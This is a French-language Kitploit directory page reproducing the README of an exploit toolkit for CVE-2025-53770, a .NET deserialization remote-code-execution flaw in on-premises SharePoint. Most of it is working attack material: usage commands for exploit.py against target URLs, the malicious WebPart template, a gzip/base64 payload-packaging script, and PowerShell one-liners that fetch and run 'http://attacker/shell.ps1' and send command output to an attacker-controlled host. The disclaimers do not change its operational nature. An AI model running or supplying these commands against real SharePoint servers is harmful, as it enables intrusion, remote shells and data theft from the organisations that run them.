Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53770-Exploit — Outil d'exploitation d'injection de WebPart SharePoint | Kitploit
Outils/GitHubGitHub/soltanali0/cve-2025-53770-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHubsoltanali0/cve-2025-53770-exploit

CVE-2025-53770-Exploit

Outil d'exploitation d'injection de WebPart SharePoint

Voir le dépôt
313773il y a 9 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

📌 Toolkit d'exploitation pour l'injection WebPart SharePoint

🍕 Outil d'exploitation pour l'injection WebPart SharePoint via ToolPane.aspx, menant à une désérialisation .NET et à une éventuelle exécution de code à distance (RCE).

Développé par : @GOTOCVE


🌍 Aperçu

Cet outil exploite une vulnérabilité dans Microsoft SharePoint (sur site) qui permet à des utilisateurs authentifiés d'abuser du point de terminaison ToolPane.aspx et d'injecter des WebParts malveillants contenant des objets .NET sérialisés compressés en GZIP.

L'objet injecté est placé dans le paramètre MSOTlPn_SelectedWpId et intégré dans un faux WebPart (tel que <Scorecard:ExcelDataSet>) qui est analysé et désérialisé par le backend SharePoint.


⚙️ Fonctionnalités

  • ✅ Validation automatique du point de terminaison (ToolPane.aspx)
  • ✅ Injection de charges utiles fournies par l'utilisateur (objets .NET LosFormatter encodés en GZIP+Base64)
  • ✅ Prise en charge du proxy pour Burp/ZAP
  • ✅ Prise en charge d'une saisie de charge utile basée sur fichier ou directe

🧪 Versions prises en charge

ProduitVersions affectées
SharePoint Server 201616.0.4351.1000 - 16.0.5508.1000
SharePoint Server 201916.0.10337.12109 - 16.0.10417.20027

⚡ Résumé de la vulnérabilité

ChampValeur
ComposantMicrosoft SharePoint (sur site)
Point de terminaison/layouts/15/ToolPane.aspx
ParamètreMSOTlPn_DWP
WebPart<Scorecard:ExcelDataSet CompressedDataTable>
ProblèmeDésérialisation .NET non sécurisée
CVECVE-2025-53770

🧰 Composants du toolkit

✅ 1. exploit.py

Outil d'exploitation SharePoint multithread pour CVE-2025-53770.

  • Détecte SharePoint + version
  • Vérifie l'accès à /ToolPane.aspx
  • Envoie une charge utile WebPart malveillante

✅ 2. YSLosf.exe

Générateur de charges utiles et désérialiseur LosFormatter.

image

🚀 Utilisation

🔸 Utilisation de base

root@kitploit:~
python3 exploit.py -u https://target -p payload.txt

🔸 Cibles multiples

root@kitploit:~
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080

🔸 Tous les arguments

ArgumentDescription
-uURL cible (p. ex., https://sp.company.local)
-fFichier contenant les URL cibles (une par ligne)
-pFichier de charge utile ou chaîne Base64 GZIP directe
--proxyProxy facultatif (p. ex., http://127.0.0.1:8080)
-tDélai d'attente en secondes (défaut : 15)

🔧 Prérequis

  • Python 3.10
  • Installer les dépendances :
root@kitploit:~
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  • Runtime .NET 4.8 (pour exécuter YSLosf.exe)

💥 Structure de la charge utile

Votre charge utile doit :

  1. Être un objet .NET (p. ex. DataSet, ObjectDataProvider)
  2. Être sérialisée à l'aide de LosFormatter ou BinaryFormatter
  3. Être encodée en Base64
  4. Être compressée en GZIP

Intégrée dans un WebPart comme :

root@kitploit:~
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>

🛠 Génération de charges utiles avec YSLosf

Étape 1 : Créer le fichier de charge utile

Placez votre commande (p. ex., reverse shell) dans payload.txt :

root@kitploit:~
powershell -nop -c iwr http://attacker/shell.ps1 | iex

Étape 2 : Générer la charge utile Base64

root@kitploit:~
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc

Étape 3 : Compresser et finaliser

root@kitploit:~
# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)

Enregistrez la sortie dans payload-final.txt et transmettez-la à l'outil d'exploitation.


🧵 Chaînes de gadgets prises en charge

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Windows.Data.ObjectDataProvider
  • System.Web.UI.LosFormatter

📡 Remarques sur la sortie des commandes

Cette vulnérabilité ne renvoie pas de sortie (p. ex. ipconfig) dans la réponse. Vous devez :

  • Utiliser des charges utiles de reverse shell
  • Ou exfiltrer la sortie :
root@kitploit:~
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"

⚠️ Avertissement légal

Cet outil est fourni uniquement à des fins de tests de sécurité éducatifs et autorisés.

Ne l'utilisez pas contre des systèmes sans autorisation explicite. Une mauvaise utilisation peut être illégale et contraire à l'éthique.


🔍 Détection

Si un serveur vulnérable accepte la charge utile et renvoie MSOTlPn_SelectedWpId ou affiche la page avec le WebPart injecté, il est probablement exploitable. L'absence de sortie signifie que la désérialisation a échoué ou que le serveur a été corrigé.


🛑 Clarification légale et portée de cet outil

Cet outil ne livre ni n'exécute de shellcode ou web shell. Il démontre uniquement l'exploitation de la vulnérabilité de désérialisation .NET (CVE-2025-53770) via le point de terminaison vulnérable ToolPane.aspx en utilisant une structure WebPart malveillante contenant un objet .NET compressé en GZIP.

🔹 Objectif : Aider les chercheurs, les red teamers et les défenseurs à détecter les serveurs SharePoint vulnérables et à tester le vecteur d'injection en toute sécurité avec des charges utiles personnalisées.

🔹 Charges utiles : L'outil exige que les utilisateurs génèrent leurs propres charges utiles (p. ex., en utilisant YSLosf.exe) qui sont intégrées dans le WebPart sous forme de chaînes GZIP encodées en Base64.
Il est de la responsabilité de l'utilisateur de choisir des charges utiles appropriées et éthiques (telles que l'exécution inoffensive de calc.exe, des marqueurs de beacon, etc.).

🔹 AUCUN reverse shell/web shell inclus :
Bien que des attaquants dans la nature puissent déposer des web shells comme spinstall0.aspx, ce projet n'inclut aucune logique de ce type.
Si vous prévoyez de livrer un reverse shell, vous devez générer votre propre charge utile manuellement et assumer l'entière responsabilité de son utilisation.

Historique des étoiles

Star History Chart

📢 Plus d'exploits et de CVE ?

Rejoignez @GOTOCVE sur Telegram :

  • 🔍 Analyses hebdomadaires de CVE
  • 🧠 Analyses approfondies d'exploits
  • 🛡 Contenu Red & Blue Team
  • 💣 Vrais PoC & conseils de détection

📬 Contact

Créé par Ali Soltani
Pour les demandes de recherche ou les rapports de bugs, contactez via Telegram

Télécharger l’outil